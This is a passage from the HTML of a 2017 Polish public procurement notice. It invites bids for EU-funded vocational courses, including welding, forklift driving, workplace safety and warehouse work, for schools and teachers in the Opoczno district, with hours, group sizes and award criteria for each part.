              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Informacje zawarte we wzorach umów - Część I  załącznik nr 3/1 do SIWZ, Część II  załącznik nr 3/2 do SIWZ, Część III  załącznik nr 3/3 do SIWZ, Część IV  załącznik nr 3/4 do SIWZ, Część V  załącznik nr 3/5 do SIWZ, Część VI  załącznik nr 3/6 do SIWZ, Część VII  załącznik nr 3/7 do SIWZ
Część VIII  załącznik nr 3/8 do SIWZ, Część IX  załącznik nr 3/9 do SIWZ, Część X  załącznik nr 3/10 do SIWZ, Część XI  załącznik nr 3/11 do SIWZ, Część XII  załącznik nr 3/12 do SIWZ, Część XIII  załącznik nr 3/13 do SIWZ, Część XIV  załącznik nr 3/14 do SIWZ, Część XV  załącznik nr 3/15 do SIWZ, Część XVI  załącznik nr 3/16 do SIWZ.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/02/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>KURS ORGANIZACJI PRZYJĘĆ OKOLICZNOŚCIOWYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do przeprowadzenia usługi edukacyjnej dla uczniów/uczennic Zasadniczej Szkoły Zawodowej w Zespole Szkół Zawodowych w Żarnowie zakwalifikowanych do projektu Szkoły Zawodowe z terenu powiatu opoczyńskiego drogą do sukcesu na regionalnym rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmującej kurs Organizacji przyjęć okolicznościowych zgodnie z załącznikiem nr 1/1 do SIWZ zwany dalej kursem.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć w ramach kursu zgodnie z następującą tematyką: 
Teoria: zagadnienia z zakresu zakładania firmy, marketing oraz planowanie, organizacja i obsługa różnych form przyjęć okolicznościowych, obsługa konsumenta.
Praktyka: przygotowanie dania oraz nakrywanie, dekoracja stołu.
Realizacja kursu obejmuje egzamin wewnętrzny teoretyczny  rozmowa z uczestnikami/uczestniczkami i egzamin   praktyczny  przygotowanie dania, nakrywanie i dekoracja stołu. 
3.	Wykonawca przeprowadzi kurs:
	dla 10 uczniów/uczennic projektu (1 grupa) w roku szkolnym 2016/2017 
	o łącznej liczbie 100 godzin dydaktycznych ( 25 h teoria, 75 h praktyka).
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>terin zapłaty faktury/rachunku</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>KURS SPAWACZA METODĄ MAG 135<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla 
5 uczniów/uczennic Zasadniczej Szkoły Zawodowej w Zespole Szkół Zawodowych w Żarnowie oraz 
5 uczniów/uczennic Zasadniczej Szkoły Zawodowej w Zespole Szkół Ponadgimnazjalnych w Drzewicy zakwalifikowanych do projektu Szkoły Zawodowe z terenu powiatu opoczyńskiego drogą do sukcesu na regionalnym rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmujących kurs Spawacza metodą MAG 135 zgodnie z załącznikiem nr 1/2 do SIWZ zwany dalej kursem.
2. Wykonawca zobowiązany jest do przeprowadzenia zajęć w ramach kursu zgodnie z następującą tematyką: 
Teoria: Procesy spajania, rysunek techniczny, materiały podstawowe i dodatkowe, podstawy elektrotechniki, urządzenia, sprzęt i techniki spawania, przepisy bhp i ppoż. 
Praktyka: praktyczna nauka spawania metoda MAG 135. 
3.	Wykonawca posiada aktualny atest uprawniający jednostkę szkoleniową do szkolenia i egzaminowania uczestników kursu spawacza metodą MAG 135, jeżeli jest wymagany.
4.	Wykonawca przeprowadzi kurs: dla 10 uczestników/uczestniczek projektu (1 grupa) w roku szkolnym 2016/2017 o łącznej liczbie 145 godzin dydaktycznych, w tym 30 h teoria, 115 h praktyka.
Grupa docelowa: uczniowie/uczennice z kierunku kształcenia mechanik pojazdów samochodowych:
- 5 uczniów/uczennic Zasadniczej Szkoły Zawodowej z Zespołu Szkół Zawodowych 
w  Żarnowie, 
- 5 uczniów/uczennic Zasadniczej Szkoły Zawodowej z Zespołu Szkół Ponadgimnazjalnych 
w Drzewicy.
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>SZKOLENIE WSTĘPNE / INSTRUKTAŻ OGÓLNY W ZAKRESIE BEZPIECZEŃSTWA I HIGIENY PRACY <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług szkoleniowych dla uczniów/uczennic w Zasadniczej Szkole Zawodowej w Zespole Szkół Zawodowych w Żarnowie zakwalifikowanych do projektu Szkoły Zawodowe z terenu powiatu opoczyńskiego drogą do sukcesu na regionalnym rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmujących szkolenie wstępne / instruktaż ogólny w zakresie bezpieczeństwa i higieny pracy zgodnie z załącznikiem nr 1/3 do SIWZ zwane dalej szkoleniem. 
2.	Wykonawca zobowiązany jest do przeprowadzenia szkolenia zgodnie z celem szkolenia, tj. uzyskanie kompetencji z zakresu BHP- instruktaż ogólny przez uczniów/uczennice oraz zaznajomienie ich w szczególności z:  
a) podstawowymi przepisami bezpieczeństwa i higieny pracy zawartymi w Kodeksie pracy , w układach zbiorowych pracy lub w regulaminach pracy,
b) przepisami oraz zasadami bezpieczeństwa i higieny pracy obowiązującymi w danym zakładzie pracy,
c) zasadami udzielania pierwszej pomocy w razie wypadku. 
3.	Wykonawca przeprowadzi szkolenie dla 21 uczestników/uczestniczek projektu (2 grupy: - 1 grupa 10 uczniów/uczennic z kierunku kształcenia w zawodach: kucharz (6 uczniów/uczennic), cukiernik (4 uczniów/uczennic)  2 grupa  11 uczniów/uczennic z kierunku kształcenia w Zawodach: mechanik pojazdów samochodowych (9 uczniów/uczennic), elektryk (2 uczniów/uczennice) kierowanych na praktyki zawodowe zgodne z kierunkiem kształcenia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury/rachnku</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>KURS MAGAZYNIER Z OBSŁUGĄ KAS FISKALNYCH I FAKTUROWANIEM KOMPUTEROWYM<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usługi edukacyjnej dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych w Drzewicy zakwalifikowanych do projektu Doskonalenie umiejętności i kompetencji praktycznych uczniów Technikum i poszerzenie kompetencji nauczycieli Zespołu Szkół Ponadgimnazjalnych w Drzewicy  kolejny krok do sukcesu zawodowego absolwentów szkoły współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmujących kurs magazynier z obsługą kas fiskalnych i fakturowaniem komputerowym zgodnie z załącznikiem nr 1/4 do SIWZ zwany dalej kursem.
2. Wykonawca zobowiązany jest do przeprowadzenia zajęć w ramach kursu zgodnie z następującą tematyką: 
Teoria; podstawy prawne, sprzedaż detaliczna i hurtowa, dokumentacja handlowa i magazynowa, podstawy towaroznawstwa z uwzględnieniem norm ISO, BHP, technologia prac magazynowych, wspomaganie komputerowe przy prowadzeniu ewidencji magazynowej, fakturowanie, inwentaryzacja w magazynie, obsługa kas fiskalnych.
Praktyka: wypełnianie dokumentów w formie elektronicznej, obsługa kasy fiskalnej.
Realizacja kursu obejmuje egzamin teoretyczny w formie rozmowy z prowadzącym oraz egzamin praktyczny: wypełnianie dokumentów w formie elektronicznej, obsługa kasy fiskalnej.
3.	Wykonawca przeprowadzi kurs dla 19 uczestników/uczestniczek projektu (1 grupa) w roku szkolnym 2016/2017 o łącznej liczbie 213 godzin dydaktycznych (85 h teoria, 128 h praktyka).
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>KURS KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM I WYMIANĄ BUTLI Z GAZEM<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usługi edukacyjnej dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych w Drzewicy zakwalifikowanych do projektu Doskonalenie umiejętności i kompetencji praktycznych uczniów Technikum i poszerzenie kompetencji nauczycieli Zespołu Szkół Ponadgimnazjalnych w Drzewicy  kolejny krok do sukcesu zawodowego absolwentów szkoły współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmującej kurs kierowcy wózka jezdniowego z napędem silnikowym 
i wymianą butli z gazem zgodnie z załącznikiem nr 1/5 do SIWZ zwany dalej kursem.
2.  Wykonawca zobowiązany jest do przeprowadzenia zajęć w ramach kursu zgodnie z następującą tematyką: 
Teoria: Typy stosowanych wózków jezdniowych, budowa wózka jezdniowego, czynności kierowcy przy obsłudze wózków jezdniowych, czynności przed przejęciem pracy, w czasie i po pracy wózka jezdniowego, ładunkoznawstwo, zagadnienie dozoru technicznego, zasady budowy, działania i obsługi butli, instalacji gazowych , wymiana butli z gazem w wózku jezdniowym,  przepisy bhp i ppoż. 
Praktyka: praktyczna nauka jazdy wózkiem jezdniowym.
Realizacja kursu obejmuje egzamin teoretyczny w formie testu i egzamin praktyczny  przejazd wózkiem jezdniowym.
3.	Program kursu w zakresie obsługi wózków jezdniowych musi być zgodny z aktualnym ramowym programem nauczania zatwierdzonym przez Urząd Dozoru Technicznego nadzorowany przez Ministra właściwego do spraw gospodarki, z rozszerzeniem o szkolenie na wymianę butli gazowych.
4.	Wykonawca przeprowadzi kurs: dla 27 uczestników/uczestniczek projektu z kierunku kształcenia technik logistyk  (3 grupy o łącznej liczbie 201 godzin dydaktycznych  rok szkolny 2016/2017 do 30.06.2017r.  1 grupa  8 osób; rok szkolny 2017/2018 od 30.09.2017r.  28.02.2018r.  2 grupa  10 osób, 3 grupa  9 osób). 
Jednostka jedna godzina dydaktyczna, używana jest w rozumieniu 1 godziny lekcyjnej trwającej 45 minut.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>temin zapłaty fatury/rachunku</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>SZKOLENIE WSTĘPNE / INSTRUKTAŻ OGÓLNY W ZAKRESIE BEZPIECZEŃSTWA I HIGIENY PRACY<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usługi szkoleniowej dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych w Drzewicy zakwalifikowanych do projektu Doskonalenie umiejętności i kompetencji praktycznych uczniów Technikum i poszerzenie kompetencji nauczycieli Zespołu Szkół Ponadgimnazjalnych w Drzewicy  kolejny krok do sukcesu zawodowego absolwentów szkoły współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmującej szkolenie wstępne / instruktaż ogólny w zakresie bezpieczeństwa i higieny pracy zgodnie z załącznikiem nr 1/6 do SIWZ zwane dalej szkoleniem. 
2.	Wykonawca zobowiązany jest do przeprowadzenia szkolenia zgodnie z celem szkolenia, tj. uzyskanie kompetencji z zakresu BHP przez uczniów/uczennice oraz zaznajomienie ich w szczególności z:  
a) podstawowymi przepisami bezpieczeństwa i higieny pracy zawartymi w Kodeksie pracy, 
w układach zbiorowych pracy lub w regulaminach pracy,
b) przepisami oraz zasadami bezpieczeństwa i higieny pracy obowiązującymi w danym zakładzie pracy,
c) zasadami udzielania pierwszej pomocy w razie wypadku. 
3.	Wykonawca przeprowadzi szkolenie dla 27 uczestników/uczestniczek projektu z kierunku kształcenia technik logistyk: 2 grupy: 
- 1 grupa 14 uczniów/uczennic, 
- 2 grupa 13 uczniów/uczennic,
 kierowanych na staże zawodowe zgodne z kierunkiem kształcenia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/06/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury/rachunku  </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>SZKOLENIE W ZAKRESIE ELEKTRONIKI I ELEKTROTECHNIKI Z ZAKRESU MECHANIKI POJAZDOWEJ<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla nauczycieli kształcenia zawodowego oraz instruktorów praktycznej nauki zawodu kształcących w Zespole Szkół Technicznych w Mroczkowie Gościnnym zakwalifikowanych do projektu Centrum Kształcenia Zawodowego i Ustawicznego szansą na sprawne połączenie wysoko wyspecjalizowanej kadry dydaktycznej z oczekiwaniami otoczenia społeczno-gospodarczego wobec absolwentów kierunków branży mechanicznej i budowlanej współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmujących szkolenie w zakresie elektroniki i elektrotechniki z zakresu mechaniki pojazdowej, zgodnie z załącznikiem nr 1/7 do  SIWZ zwane dalej szkoleniem.
2. Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: 
Teoria szkolenia w zakresie elektroniki i elektrotechniki z zakresu mechaniki pojazdowej obejmuje następujące zagadnienia: wiadomości z zakresu elektrotechniki i podstaw elektroniki pojazdowej oraz pozyskanie umiejętności manualnych w przypadku diagnozowania urządzeń i układów elektrycznych w pojazdach, poznanie najczęściej spotykanych urządzeń elektrotechnicznych oraz elektronicznych, a także ich uszkodzeń oraz sposób ich weryfikacji w pojeździe.
3.	Wykonawca poprowadzi szkolenie:
	   dla 4 nauczycieli kształcenia zawodowego oraz instruktorów praktycznej nauki zawodu,
	obejmujące liczbę godzin szkolenia: 14 godzin 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty faktury/rachunku</td><td>20</td></tr><tr><td>materiały szkoleniowe</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>SZKOLENIE W ZAKRESIE DIAGNOSTYKI SILNIKÓW SPALINOWYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zamawiający zleca a Wykonawca zobowiązuje się do świadczenia usług edukacyjnych dla nauczycieli kształcenia zawodowego oraz instruktorów praktycznej nauki zawodu kształcących w Zespole Szkół Technicznych w Mroczkowie Gościnnym zakwalifikowanych do projektu Centrum Kształcenia Zawodowego i Ustawicznego szansą na sprawne połączenie wysoko wyspecjalizowanej kadry dydaktycznej z oczekiwaniami otoczenia społeczno-gospodarczego wobec absolwentów kierunków branży mechanicznej i budowlanej współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020 zwanego dalej projektem, obejmujących szkolenie w zakresie diagnostyki silników spalinowych, zgodnie z załącznikiem nr 1/8 do SIWZ zwane dalej szkoleniem.
2.	Wykonawca zobowiązany jest do przeprowadzenia zajęć zgodnie z następującą tematyką: 
Teoria szkolenia w zakresie diagnostyki silników spalinowych obejmuje w szczególności następujące zagadnienia dotyczące umiejętności manualnych w przypadku diagnozowania uszkodzeń silnika spalinowego, poznanie najczęściej spotykanych uszkodzeń układów i podzespołów silnika spalinowego oraz sposobu ich weryfikacji w pojeździe.
3.	Wykonawca przeprowadzi szkolenie:
	dla 4 nauczycieli kształcenia zawodowego oraz instruktorów praktycznej nauki zawodu,
	obejmujący liczbę godzin szkolenia: 14 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4, 80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
